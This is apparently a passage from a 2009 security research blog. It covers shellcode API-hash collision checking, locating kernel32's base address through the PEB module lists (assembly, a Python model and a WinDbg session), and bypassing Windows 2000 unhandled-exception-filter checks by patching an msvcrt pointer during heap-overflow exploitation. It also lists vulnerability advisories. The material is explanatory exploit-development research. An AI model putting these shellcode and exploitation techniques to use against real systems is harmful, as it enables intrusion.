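    wanted = {}
    for module, function in targets:
        wanted[hash_fn(module, function)] = (module.lower(), function)
    collisions = []
    for module, function in exports:
        candidate = (module.lower(), function)
        h = hash_fn(module, function)
        if h in wanted and wanted[h] != candidate:
            collisions.append((wanted[h], candidate, h))
    return collisions
```

Passing the hash function in as a parameter makes it easy to check the scanner itself with a deliberately weak hash before running it against a full system.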

Metasploit Integration

The majority of the Metasploit[7] x86 Windows payloads have been rewritten using the techniques presented here in order to bring Windows 7 and backwards compatibility to the stagers, stages and singles as well as considerable size reductions for the stagers and stages. Work on x64 payloads is under way.

References

[1] http://hick.org/code/skape/papers/win32-shellcode.pdf
[2] http://code.google.com/p/w32-bind-ngs-shellcode/
[3] http://msdn.microsoft.com/en-us/library/9b372w95.aspx
[4] http://sourceforge.net/projects/nasm/
[5] http://msdn.microsoft.com/en-us/magazine/cc301808.aspx
[6] http://code.google.com/p/pefile/
[7] http://www.metasploit.com/

Wednesday, 22 July 2009

Akamai Download Manager Stack Buffer Overflow Vulnerability

iDefense have published an advisory for a stack buffer overflow vulnerability in the Akamai Download Manager which was discovered by Stephen Fewer of Harmony Security. The vulnerability affects the ActiveX version of the download manager (Versions <= 2.2.3.7) and results in arbitrary code execution through the victim's browser after the victim visits a malicious web page.

You can read the full iDefense advisory here:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=813

And the Akamai advisory here:
http://seclists.org/bugtraq/2009/Jul/0165.html
http://www.akamai.com/html/support/security.html

Novell Privileged User Manager Remote DLL Injection Vulnerability

TippingPoint's Zero Day Initiative (ZDI) has published an advisory for a critical remote pre-authentication arbitrary DLL injection vulnerability in the Novell Privileged User Manager which was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:
http://www.zerodayinitiative.com/advisories/ZDI-09-046/

And the Novell advisory here:
http://www.novell.com/support/viewContent.do?externalId=7003640

Friday, 19 June 2009

Retrieving Kernel32's Base Address

For shellcode, a common method of resolving the addresses of the library functions needed is to get the base address of the kernel32.dll image in memory and retrieve the addresses of GetProcAddress and LoadLibraryA by parsing the kernel32 image's Export Address Table (EAT). These two functions can then be used to resolve the remaining functions needed by the shellcode. To retrieve the kernel32.dll base address most shellcodes use the Process Environment Block (PEB) structure to retrieve a list of modules currently loaded in the process's address space. The InInitializationOrder module list pointed to by the PEB's Ldr structure holds a linked list of modules. Typically the second entry in this list has always been that of kernel32.dll. The code used to retrieve the kernel32 base address based on this method is shown below:

xor ebx, ebx // clear ebx
mov ebx, fs:[ 0x30 ] // get a pointer to the PEB
mov ebx, [ ebx + 0x0C ] // get PEB->Ldr
mov ebx, [ ebx + 0x1C ] // get PEB->Ldr.InInitializationOrderModuleList.Flink (1st entry)
mov ebx, [ ebx ] // get the next entry (2nd entry)
mov ebx, [ ebx + 0x08 ] // get the 2nd entry's base address (kernel32.dll)

This method has worked for all versions of Windows from Windows 2000 up to and including Windows Vista. The introduction of Windows 7 (rc1) has broken this method of retrieving the kernel32 base address due to the new MinWin kernel structure employed by Windows 7. A new module kernelbase.dll is loaded before kernel32.dll and as such appears in the second entry of the InInitializationOrder module list.

To retrieve the kernel32.dll base address in a generic manner on all versions of Windows from Windows 2000 up to and including Windows 7 (rc1) a slightly modified approach can be used. Instead of parsing the PEB's InInitializationOrder module list, the InMemoryOrder module list can be parsed instead. The third entry in this list will always be that of kernel32.dll (The first being that of the main module and the second being that of ntdll.dll). The code used to retrieve the kernel32 base address based on this method is shown below:

xor ebx, ebx // clear ebx
mov ebx, fs:[ 0x30 ] // get a pointer to the PEB
mov ebx, [ ebx + 0x0C ] // get PEB->Ldr
mov ebx, [ ebx + 0x14 ] // get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
mov ebx, [ ebx ] // get the next entry (2nd entry)
mov ebx, [ ebx ] // get the next entry (3rd entry)
mov ebx, [ ebx + 0x10 ] // get the 3rd entry's base address (kernel32.dll)

Update: There appear to be some cases on Windows 2000 where the above method will not yield the correct result. A more robust method, albeit a lengthier one, can be seen below. We search the InMemoryOrder module list for the kernel32 module using a hash of the module name for comparison. We also normalise the module name to uppercase as some systems store module names in uppercase and some in lowercase.

cld // clear the direction flag for the loop
xor edx, edx // zero edx

mov edx, [fs:edx+0x30] // get a pointer to the PEB
mov edx, [edx+0x0C] // get PEB->Ldr
mov edx, [edx+0x14] // get the first module from the InMemoryOrder module list
next_mod:
mov esi, [edx+0x28] // get pointer to the module's name (unicode string)
push byte 24 // push down the length we want to check
pop ecx // set ecx to this length for the loop
xor edi, edi // clear edi which will store the hash of the module name
loop_modname:
xor eax, eax // clear eax
lodsb // read in the next byte of the name
cmp al, 'a' // some versions of Windows use lower case module names
jl not_lowercase
sub al, 0x20 // if so normalise to uppercase
not_lowercase:
ror edi, 13 // rotate right our hash value
add edi, eax // add the next byte of the name to the hash
loop loop_modname // loop until we have read enough
cmp edi, 0x6A4ABC5B // compare the hash with that of KERNEL32.DLL
mov ebx, [edx+0x10] // get this module's base address
mov edx, [edx] // get the next module
jne next_mod // if it doesn't match, process the next module

// when we get here EBX is the kernel32 base (or change to suit).
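
The hash computed by the loop above can be reproduced off-target with a short Python model, which is handy for generating the constant for a different module name. This is a sketch that mirrors the assembly: 24 bytes of the UTF-16LE name are consumed, bytes at or above 'a' are shifted to uppercase, and each byte is added after a 13 bit rotate right. The function names are our own.

```python
def ror13(value):
    """Rotate a 32-bit value right by 13 bits."""
    return ((value >> 13) | (value << 19)) & 0xFFFFFFFF


def module_name_hash(name, length=24):
    """Hash the first `length` bytes of the UTF-16LE module name.
    The assembly always reads 24 bytes, so shorter names would pick up
    whatever follows the string in memory; this model does not emulate that."""
    h = 0
    for b in name.encode("utf-16-le")[:length]:
        # cmp al, 'a' / jl is a signed compare, so bytes >= 0x80 are left alone
        if 0x61 <= b < 0x80:
            b -= 0x20
        h = (ror13(h) + b) & 0xFFFFFFFF
    return h


print(hex(module_name_hash("kernel32.dll")))  # 0x6a4abc5b
```

Both "kernel32.dll" and "KERNEL32.DLL" produce 0x6A4ABC5B, matching the constant compared against in the loop.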

To verify these methods on your own system you can use the following tool: GetKernel32Base.zip

This code has been verified on the following systems:

  • Windows 2000 SP4
  • Windows XP SP2
  • Windows XP SP3
  • Windows 2003 SP2
  • Windows Vista SP1
  • Windows 2008 SP1
  • Windows 7 RC1

The following WinDbg session shows how we can manually verify the above methods on a Windows 7 RC1 system:

0:004> version
Windows 7 Version 7100 UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7100.0 (winmain_win7rc.090421-1700)
...

// list the loaded modules...
0:004> lm
start end module name
00d20000 00de0000 calc (pdb symbols)
70930000 70a77000 msxml6 (pdb symbols)
725c0000 725fc000 oleacc (pdb symbols)
73e10000 73e42000 WINMM (pdb symbols)
73e50000 73f49000 WindowsCodecs (pdb symbols)
74170000 74183000 dwmapi (pdb symbols)
742c0000 74450000 gdiplus (pdb symbols)
74450000 74490000 UxTheme (pdb symbols)
745d0000 7476c000 COMCTL32 (pdb symbols)
74b50000 74b59000 VERSION (pdb symbols)
755a0000 755ac000 CRYPTBASE (pdb symbols)
756d0000 75718000 KERNELBASE (pdb symbols)
75950000 7596f000 IMM32 (pdb symbols)
75970000 759ff000 OLEAUT32 (pdb symbols)
75a00000 75ac9000 USER32 (pdb symbols)
75ae0000 75bac000 MSCTF (pdb symbols)
75d60000 75e02000 RPCRT4 (pdb symbols)
75e60000 75f0c000 msvcrt (pdb symbols)
75f50000 75ff0000 ADVAPI32 (pdb symbols)
75ff0000 7608d000 USP10 (pdb symbols)
76090000 76113000 CLBCatQ (pdb symbols)
76120000 7627b000 ole32 (pdb symbols)
76280000 762d7000 SHLWAPI (pdb symbols)
763e0000 77026000 SHELL32 (pdb symbols)
77030000 77049000 sechost (pdb symbols)
77050000 77124000 kernel32 (pdb symbols)
77160000 771ae000 GDI32 (pdb symbols)
77500000 7763c000 ntdll (pdb symbols)
77720000 7772a000 LPK (pdb symbols)

// dump the PEB...

0:004> !peb
PEB at 7ffdc000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: Yes
ImageBaseAddress: 00d20000
Ldr 775d7880
Ldr.Initialized: Yes
Ldr.InInitializationOrderModuleList: 00221a28 . 002b13a0
Ldr.InLoadOrderModuleList: 00221988 . 002b1390
Ldr.InMemoryOrderModuleList: 00221990 . 002b1398
...

// show the Ldr.InInitializationOrderModuleList
// dump the first entry...
0:004> dd 00221a28
00221a28 00221e68 775d789c 77500000 00000000 // 77500000 = ntdll.dll
00221a38 0013c000 003c003a 002218e8 00140012
00221a48 7756835c 00004004 0000ffff 775da680
00221a58 775da680 49eea66e 00000000 00000000
// dump the second entry...
0:004> dd 00221e68
00221e68 00221d50 00221a28 756d0000 756d8005 // 756d0000 = KERNELBASE.dll
00221e78 00048000 00460044 00221df8 001e001c
00221e88 00221e20 00084004 0000ffff 0022a9b4
00221e98 775da690 49eea60f 00000000 00000000
// we can see the second entry is for kernelbase.dll and not kernel32.dll

// show the Ldr.InMemoryOrderModuleList
// dump the first entry...
0:004> dd 00221990
00221990 00221a20 775d7894 00000000 00000000
002219a0 00d20000 00d30140 000c0000 003a0038 // 00d20000 = calc.exe
002219b0 002217fa 00120010 00221822 00004000
002219c0 0000ffff 00222b84 775da6a8 49ee917f
// dump the second entry...
0:004> dd 00221a20
00221a20 00221d48 00221990 00221e68 775d789c
00221a30 77500000 00000000 0013c000 003c003a // 77500000 = ntdll.dll
00221a40 002218e8 00140012 7756835c 00004004
00221a50 0000ffff 775da680 775da680 49eea66e
// dump the third entry...
0:004> dd 00221d48
00221d48 00221e60 00221a20 002227e8 00221e68
00221d58 77050000 770a102d 000d4000 00420040 // 77050000 = kernel32.dll
00221d68 00221ce0 001a0018 00221d08 00084004
00221d78 0000ffff 002248a4 775da640 49eea60e
// we can see the third entry is for kernel32.dll
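
The same walk can be replayed in Python against the values dumped in the session above, which makes it easy to see which offsets each method depends on. This is only an illustrative model: the dictionary holds just the handful of dwords taken from the WinDbg output, and the function names are hypothetical.

```python
LDR = 0x775D7880  # PEB->Ldr from the !peb output

# address -> dword, copied from the dd output in the session above
MEMORY = {
    LDR + 0x14: 0x00221990,         # Ldr.InMemoryOrderModuleList.Flink
    LDR + 0x1C: 0x00221A28,         # Ldr.InInitializationOrderModuleList.Flink
    0x00221990: 0x00221A20,         # 1st InMemoryOrder entry -> 2nd
    0x00221A20: 0x00221D48,         # 2nd InMemoryOrder entry -> 3rd
    0x00221D48 + 0x10: 0x77050000,  # 3rd InMemoryOrder entry, base address
    0x00221A28: 0x00221E68,         # 1st InInitializationOrder entry -> 2nd
    0x00221E68 + 0x08: 0x756D0000,  # 2nd InInitializationOrder entry, base address
}


def read32(address):
    return MEMORY[address]


def third_in_memory_order(ldr):
    entry = read32(ldr + 0x14)   # 1st entry
    entry = read32(entry)        # 2nd entry
    entry = read32(entry)        # 3rd entry
    return read32(entry + 0x10)  # base address


def second_in_initialization_order(ldr):
    entry = read32(ldr + 0x1C)   # 1st entry
    entry = read32(entry)        # 2nd entry
    return read32(entry + 0x08)  # base address


print(hex(third_in_memory_order(LDR)))           # 0x77050000 (kernel32)
print(hex(second_in_initialization_order(LDR)))  # 0x756d0000 (KERNELBASE)
```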

Tuesday, 28 April 2009

TIBCO SmartSockets Stack Buffer Overflow Vulnerability

iDefense have published an advisory for a critical remote pre-authentication code execution vulnerability (CVE-2009-1291) in the TIBCO SmartSockets framework which was discovered by Stephen Fewer of Harmony Security. The affected components are as follows:

  • TIBCO SmartSockets®
  • TIBCO SmartSockets® Product Family Modules (formerly RTworks)
  • TIBCO Enterprise Message Service™

You can read the full iDefense advisory here:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=785

And the three TIBCO advisories here:
http://www.tibco.com/multimedia/security_advisory_smartsockets_tcm8-7560.txt
http://www.tibco.com/multimedia/security_advisory_rtworks_tcm8-7559.txt
http://www.tibco.com/multimedia/security_advisory_ems_tcm8-7558.txt

Saturday, 7 March 2009

Windows 2000 UEF Overwrite Oddity

After firing up an old Windows 2000 SP4 VM during the week to code up a heap overflow PoC, I came across a small oddity when attempting to gain code execution by overwriting kernel32's top level Unhandled Exception Filter (Halvar Flake - Third Generation Exploitation) after I had run Windows Update.

Previously, overwriting kernel32's top level UEF would give you control after an unhandled exception occurred; however, this no longer seemed to work.

After digging around kernel32!SetUnhandledExceptionFilter and kernel32!UnhandledExceptionFilter in the current kernel32 version (5.00.2195.7135) and a previous one (5.00.2195.7006) it seems MS changed the way kernel32 accesses the top level UEF. Previously the UEF was set and handled as shown in the summarized snippet below:

// as seen in kernel32.dll (5.00.2195.7006)

LP_UEF pTopLevelExceptionFilter;

LP_UEF SetUnhandledExceptionFilter( LP_UEF lpNewFilter )
{
  LP_UEF pPreviousFilter = pTopLevelExceptionFilter;
  pTopLevelExceptionFilter = lpNewFilter;
  return pPreviousFilter; // the documented API returns the previous filter
}

DWORD UnhandledExceptionFilter( LP_EXCEPTION_POINTERS lpExceptionInfo )
{
  // ...

  // bail out only if the query succeeded and a debugger is attached
  if( NtQueryInformationProcess( GetCurrentProcess(), ProcessDebugPort, &dwDebugged, 4, NULL ) >= 0 && dwDebugged != 0 )
    return 0;

  if ( pTopLevelExceptionFilter != NULL )
  {
    dwResult = pTopLevelExceptionFilter( lpExceptionInfo );
    if( dwResult == 1 || dwResult == -1 )
      return dwResult;
  }

  // ...
}

We can see that as long as the current process is not being debugged and the top level UEF is not NULL it will be executed, so if we patch the UEF address before an exception we can get control. However the latest kernel32 sets and handles its top level UEF differently as shown in the summarized snippet below:

// as seen in kernel32.dll (5.00.2195.7135)

typedef struct _module_info
{
  HANDLE hModule; // The base address of the module which owns the UEF
  DWORD Type; // The UEF's memory region Type as set by VirtualQuery()
  DWORD RegionSize;// The UEF's memory region size as set by VirtualQuery()
  WCHAR ModuleFileName[260]; // The name of the module which owns the UEF
} ModuleInfo;

LP_UEF pTopLevelExceptionFilter;

ModuleInfo SavedUEF;

ModuleInfo * pCurrentEUF;

LP_UEF SetUnhandledExceptionFilter( LP_UEF lpNewFilter )
{
  ModuleInfo NewUEF;

  // ...

  // get some meta data about this new UEF
  GetExceptionFilterModuleInfo( lpNewFilter, &NewUEF );

  // ...

  // alloc this buffer for use later in UnhandledExceptionFilter()
  pCurrentEUF = RtlAllocateHeap( hHeapHandle, dwFlags, 532 );

  // save this meta data for later
  memcpy( &SavedUEF, &NewUEF, 532 );

  // set the new UEF
  pTopLevelExceptionFilter = lpNewFilter;

  // ...
}

DWORD UnhandledExceptionFilter( LP_EXCEPTION_POINTERS lpExceptionInfo )
{
  // ...

  // bail out only if the query succeeded and a debugger is attached
  if( NtQueryInformationProcess( GetCurrentProcess(), ProcessDebugPort, &dwDebugged, 4, NULL ) >= 0 && dwDebugged != 0 )
    return 0;

  if( pTopLevelExceptionFilter != NULL )
  {
    if( pCurrentEUF != NULL )
    {
      // get the meta data for the current UEF
      if( GetExceptionFilterModuleInfo( pTopLevelExceptionFilter, pCurrentEUF ) )
      {
        // compare the current meta data to the saved meta data
        if( pCurrentEUF->hModule == SavedUEF.hModule )
        {
          if( pCurrentEUF->RegionSize == SavedUEF.RegionSize )
          {
            if( pCurrentEUF->Type == SavedUEF.Type )
            {
              if( pCurrentEUF->Type & SEC_IMAGE )
              {
                bExecute = wcscmp( pCurrentEUF->ModuleFileName, SavedUEF.ModuleFileName) == 0;
              }
              else
              {
                bExecute = TRUE;
              }
              if( bExecute )
              {
                result = pTopLevelExceptionFilter( lpExceptionInfo );
                if ( result == 1 || result == -1 )
                  return result;
              }
            }
          }
        }
      }
    }
  }
  // ...
}

We can see that when an application now sets a top level UEF via SetUnhandledExceptionFilter(), some meta data about the new UEF is recorded, including the name of the module where the new UEF lies, the module handle (equal to the module's base address), as well as the size and type of the memory block where the UEF lives, as returned by a call to VirtualQuery().

Later, when UnhandledExceptionFilter() attempts to execute the top level UEF, it first double checks that the saved UEF meta data is equal to the current UEF's meta data. If it is, the top level UEF is called.

A problem then arises after we patch kernel32's top level UEF. When UnhandledExceptionFilter() is called the meta data won't match up and our patched UEF will not be called. We could look for a suitable address in the same memory region as the original one so as to satisfy these checks, however there is an easier way around it.
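
To see why a patched pointer fails these checks, the comparison can be modelled in Python. This is a sketch of the logic in the summarized snippet only; the field values used in the example (base addresses, region sizes, file names) are made up for illustration, and MEM_PRIVATE is the Type value VirtualQuery() reports for ordinary heap memory.

```python
from dataclasses import dataclass

SEC_IMAGE = 0x1000000    # same value as MEM_IMAGE
MEM_PRIVATE = 0x20000


@dataclass
class ModuleInfo:
    h_module: int
    type: int
    region_size: int
    module_file_name: str


def filter_would_run(saved, current):
    """Mirror the nested checks in UnhandledExceptionFilter()."""
    if current.h_module != saved.h_module:
        return False
    if current.region_size != saved.region_size:
        return False
    if current.type != saved.type:
        return False
    if current.type & SEC_IMAGE:
        return current.module_file_name == saved.module_file_name
    return True


# Hypothetical meta data saved when the legitimate UEF was registered...
saved = ModuleInfo(0x78000000, SEC_IMAGE, 0x31000, "C:\\WINNT\\system32\\msvcrt.dll")
# ...and what would be computed for a pointer patched to heap memory.
patched = ModuleInfo(0, MEM_PRIVATE, 0x1000, "")

print(filter_would_run(saved, saved))    # True
print(filter_would_run(saved, patched))  # False
```

A replacement address inside the same image region would yield identical meta data and pass, which is the alternative mentioned above.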

By default most processes have their kernel32's top level UEF set to msvcrt!__CxxUnhandledExceptionFilter. This function in turn will call an exception filter whose address is stored in a fixed location (0x7803A148 in msvcrt.dll 6.10.9844.0). Simply patching this location with our arbitrary address will allow us to ignore the checks in kernel32 and gain control after an unhandled exception. For a typical heap overflow we can get back to our shellcode via a 'CALL [ESI+0x4C]'.